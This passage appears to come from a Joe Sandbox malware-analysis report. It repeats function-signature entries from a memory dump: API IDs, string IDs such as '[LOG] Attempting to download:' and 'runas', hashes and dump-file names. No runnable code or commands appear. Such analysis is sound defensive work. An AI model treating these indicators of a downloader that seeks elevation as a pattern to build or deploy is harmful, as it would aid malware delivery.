                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID:
                            • String ID: $ $Infinity$NaN
                            • API String ID: 0-3274152445
                            • Opcode ID: cf006a216cfd5a45714d87f936f526718afe2d5a5b1a48c42635e94528737d12
                            • Instruction ID: 3c5cf95ec0e4abcfae22d2401e7c8884db78e419573af48b9e2b230c20d7183c
                            • Opcode Fuzzy Hash: cf006a216cfd5a45714d87f936f526718afe2d5a5b1a48c42635e94528737d12
                            • Instruction Fuzzy Hash: 28D26F32A1C7C18AE7519F25A4407AEFBA1FB84780F584135EA8A4BB99DF3DF4509F10
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID:
                            • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::erase
                            • API String ID: 0-2652434754
                            • Opcode ID: 2e2b6efdbd79326570f1a66c120926edcd7908f802ccfc9ed2d841f91089931f
                            • Instruction ID: 4c3de8ad6902615054cd8ce8c7564538d5f368192d85531a451f5a95b4cf58bd
                            • Opcode Fuzzy Hash: 2e2b6efdbd79326570f1a66c120926edcd7908f802ccfc9ed2d841f91089931f
                            • Instruction Fuzzy Hash: A371C076B19E8A84DA50AF19D4046FDA3A0BB45BD4F988531DF4C973E8EF38D480C351
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID:
                            • String ID: CCG
                            • API String ID: 0-1584390748
                            • Opcode ID: 9f8dda352f6cb50768de31b8ccf901b79e4bcf59fe841be1b37cc6e6e82d473f
                            • Instruction ID: c2a6e0ae0bceeb0d03cda7a3a809884fa15de59963c8f101effc32773222015f
                            • Opcode Fuzzy Hash: 9f8dda352f6cb50768de31b8ccf901b79e4bcf59fe841be1b37cc6e6e82d473f
                            • Instruction Fuzzy Hash: D5218B60E182C746FA6A72A8C4653F992829F89350F9C8935C91D8E3D1CF1DBCA1A235
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID:
                            • String ID: *$Cannot convert character sequence$basic_string: construction from null is not valid
                            • API String ID: 0-1336839915
                            • Opcode ID: fd6f9fbe49629f10d2dc253a067fe5d49f0bbc93ed45aa7e4b5bac0e0b1dd7c0
                            • Instruction ID: e0aacc751a5346c70b1ca01ecd216bb0ab9a366532122b6a4b918f8b9e66118d
                            • Opcode Fuzzy Hash: fd6f9fbe49629f10d2dc253a067fe5d49f0bbc93ed45aa7e4b5bac0e0b1dd7c0
                            • Instruction Fuzzy Hash: 27428C76A18FC581DB60AB15E4487AAB7A0FB95B94F884236DE9D83B9CDF3CD044C710
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID:
                            • String ID: $%s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::append$basic_string::erase
                            • API String ID: 0-3660802673
                            • Opcode ID: e01f3154ee16696f63d5e6906ba7627399006d1421de0a8461606c69d813896c
                            • Instruction ID: a4321caa1d90131ad9e9b797b5d1f1fb15d4f2867dacc170ae8fff138e60643e
                            • Opcode Fuzzy Hash: e01f3154ee16696f63d5e6906ba7627399006d1421de0a8461606c69d813896c
                            • Instruction Fuzzy Hash: 4A129E72608BC285EB60EF25E4403AEB365FB94B84F884135EA8D4B799DF3CE454D720
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID:
                            • String ID: $%s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::append$basic_string::erase
                            • API String ID: 0-3660802673
                            • Opcode ID: ad15aa3dbffbf6b3361315da532d5565a6948d597d80461883f95b82a729c5aa
                            • Instruction ID: 8291392c5984f5f8795c644ea3efb0c81faf3bc0d1e68b7bc8c72d05c3ba8d72
                            • Opcode Fuzzy Hash: ad15aa3dbffbf6b3361315da532d5565a6948d597d80461883f95b82a729c5aa
                            • Instruction Fuzzy Hash: 82129D72608BC185EB60EF25E4403EAB365FB94B84F885135EA8D4B799DF3CE450C760
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID:
                            • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::erase
                            • API String ID: 0-2652434754
                            • Opcode ID: a0e0d6f874318b95d2a660cd5702e84df59258e83301c24edbe5ec261facb81b
                            • Instruction ID: 743fd3a30121ab03bac1c04cc1cb8f57b32e2684a6ab3972d115ebf75b5c3551
                            • Opcode Fuzzy Hash: a0e0d6f874318b95d2a660cd5702e84df59258e83301c24edbe5ec261facb81b
                            • Instruction Fuzzy Hash: 3632A872A18BC581DBA0EB15E0403BEA7A1FF84B94F984132EA5D8B798DF3CE454D750
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: strlen
                            • String ID:
                            • API String ID: 39653677-0
                            • Opcode ID: 997f0a936e5c3eac6869c3b538b808baadb5631156a39cee0f08e1937ac41602
                            • Instruction ID: 51ee411b7bfcd7f12f1a1e93b06501b80fba6ec270dc93b4367f5f87cc668a32
                            • Opcode Fuzzy Hash: 997f0a936e5c3eac6869c3b538b808baadb5631156a39cee0f08e1937ac41602
                            • Instruction Fuzzy Hash: 0423A132A08BD585EB609B25E4403AEB7A0F785B90F494239DF9D4BB98DF3CE464D710
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: Process$CurrentTerminatememcpy
                            • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$0123456789
                            • API String ID: 1371612482-1546912705
                            • Opcode ID: 7c6c98690167acf3bf60cc988cabdca1b0ee90e96ea5e436e7499d82ebcff732
                            • Instruction ID: 9100316005ca5b39ab50290fcbf6e547dddf3b5e6d3c5a536f961a36a8380bfd
                            • Opcode Fuzzy Hash: 7c6c98690167acf3bf60cc988cabdca1b0ee90e96ea5e436e7499d82ebcff732
                            • Instruction Fuzzy Hash: 2C21F513F14AD498EB15AF6AA8006F9AB60EB09FD4F8C4172EE0D47784DE38E156D310
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: wcslen
                            • String ID:
                            • API String ID: 4088430540-0
                            • Opcode ID: 76c896bd3406ca3412a63405060ae6a04ef35f28b4929a195492a2a7c87a08f0
                            • Instruction ID: ae6501180c870ea3d1d3d55a3548aa66176400654cc1c70b13c81c07edc08e63
                            • Opcode Fuzzy Hash: 76c896bd3406ca3412a63405060ae6a04ef35f28b4929a195492a2a7c87a08f0
                            • Instruction Fuzzy Hash: 05139336A08BC589EB609F25E4402EEB761FB94B84F984131DE8D4B7A8DF3CE465D710
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: memcpy$memset
                            • String ID: $%.*Lf$basic_string::append
                            • API String ID: 438689982-2012992446
                            • Opcode ID: bca549807d1ef980c2b12770d4f979dabea5589e405c08ee8a6228ae0a2d3668
                            • Instruction ID: 3a75e752bbea0fb6bc0a53236dc9e09bfdb2ae400f8e7e4c2c8e8432ddc02158
                            • Opcode Fuzzy Hash: bca549807d1ef980c2b12770d4f979dabea5589e405c08ee8a6228ae0a2d3668
                            • Instruction Fuzzy Hash: BDF19032B18BD185EB20AB65E8402EEB760FB94B94F884136EE8D57B59CF3CE055D710
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID:
                            • String ID: %.*Lf
                            • API String ID: 0-1110018102
                            • Opcode ID: d3faa18358e3ee66ebf8e9fdb0c49b3966e2885cbbf1d59917e2a1e5342b36d9
                            • Instruction ID: 4ad28b4e41035b0ae48aebf33f20b810fe849d501d50659e9770066655d763e8
                            • Opcode Fuzzy Hash: d3faa18358e3ee66ebf8e9fdb0c49b3966e2885cbbf1d59917e2a1e5342b36d9
                            • Instruction Fuzzy Hash: CF326736A18BC585D760AF66E8402EEB760F789B94F884126EECC47B59CF3CE155CB10
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: ___lc_codepage_func___mb_cur_max_func
                            • String ID:
                            • API String ID: 1180276535-0
                            • Opcode ID: 746a0945fdf0675ec05b464090809c7fd23beabf8f6feda5459e56e920a212a9
                            • Instruction ID: b887abeca048bb0d0e760a86c3f7058c01719489109cd2d7337e6b9acdbee6a7
                            • Opcode Fuzzy Hash: 746a0945fdf0675ec05b464090809c7fd23beabf8f6feda5459e56e920a212a9
                            • Instruction Fuzzy Hash: E381F962B19EC585DA60AF1698045FAE758BB487F4F8C4631EEAC873D8EF3CD4418710
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID:
                            • String ID: [LOG] Attempting to download: $basic_ios::clear
                            • API String ID: 0-3882351015
                            • Opcode ID: 983f3405aebac6bce00d5b358cb46023571b4bdf438229fca59116f1149268e0
                            • Instruction ID: 7546938099a6e905ca40107e655d92ad826ff9068b305007ab97fd1d902cd8b0
                            • Opcode Fuzzy Hash: 983f3405aebac6bce00d5b358cb46023571b4bdf438229fca59116f1149268e0
                            • Instruction Fuzzy Hash: 6B317592B19A8594EA59BF16D4452F9A321AF85FC4F9C8436ED0D4B79ECF2CE046C320
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID:
                            • String ID: Erreur$runas
                            • API String ID: 0-3124304494
                            • Opcode ID: 037dfdd6a7b096566790e447aeec506ffb1d441ae168086e2b92bb95e24b9cd8
                            • Instruction ID: e1b11eac04608033e7082700c28f42436ef1c44afecf5603fe8d5d238708d575
                            • Opcode Fuzzy Hash: 037dfdd6a7b096566790e447aeec506ffb1d441ae168086e2b92bb95e24b9cd8
                            • Instruction Fuzzy Hash: CE119171B19F8589FB90AB61EC543E863A5FB45784F98003ACA0C9B768DF3CE545C760
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: wcslen
                            • String ID:
                            • API String ID: 4088430540-0
                            • Opcode ID: b5b4bc736404f223d6c3b5f534896595c998051c2165f619660560face98bcc5
                            • Instruction ID: 2fe73d923dac7667e27db3f51f21701226e600968f58cb0640cb2f8461b4d074
                            • Opcode Fuzzy Hash: b5b4bc736404f223d6c3b5f534896595c998051c2165f619660560face98bcc5
                            • Instruction Fuzzy Hash: 13B29C32B18F9189EB209B69D4442FC77B0FB54B84F984522DE8D17798DF38E8A2D750
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: strlen
                            • String ID:
                            • API String ID: 39653677-0
                            • Opcode ID: bbed0aab40a03dd5a56a97af2c94f09c58a8dd5a514657e17f0ea7627db2c5cf
                            • Instruction ID: 98bd25101ea3016856f1253afc03c3a9642ad2e838c3f758d4b88c598a184b37
                            • Opcode Fuzzy Hash: bbed0aab40a03dd5a56a97af2c94f09c58a8dd5a514657e17f0ea7627db2c5cf
                            • Instruction Fuzzy Hash: 51B29B32A08B9185EB209B65D4443AC77B0F748BA4F59867ACFAD57B98CF3CE851D310
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7dcdb0a408daafb29028e784a419d5f8deadc5394643995bbffb94bdf45834a9
                            • Instruction ID: 760476151337a85bd429a7cf8e8fbf15af73aab996942dbb26e0df6fac738e0e
                            • Opcode Fuzzy Hash: 7dcdb0a408daafb29028e784a419d5f8deadc5394643995bbffb94bdf45834a9
                            • Instruction Fuzzy Hash: B9A2842260CAD185E7649A2990403AEFBA5F785BA4F584235DB9D83BE8CF7CD4948B10
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d58d65cf8065fe990f2c688e16615a0b9efd66875e171791f71746ca70f5a13a
                            • Instruction ID: 66e0f04202acf3353588cd0412f5c57f5ef45e13b31003ab13fc37e54525b721
                            • Opcode Fuzzy Hash: d58d65cf8065fe990f2c688e16615a0b9efd66875e171791f71746ca70f5a13a
                            • Instruction Fuzzy Hash: 1CA2C52260CFC185E7709A2990443AEFBA5F786BA4F584235DB9D83BD8CF7DE4548B10
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
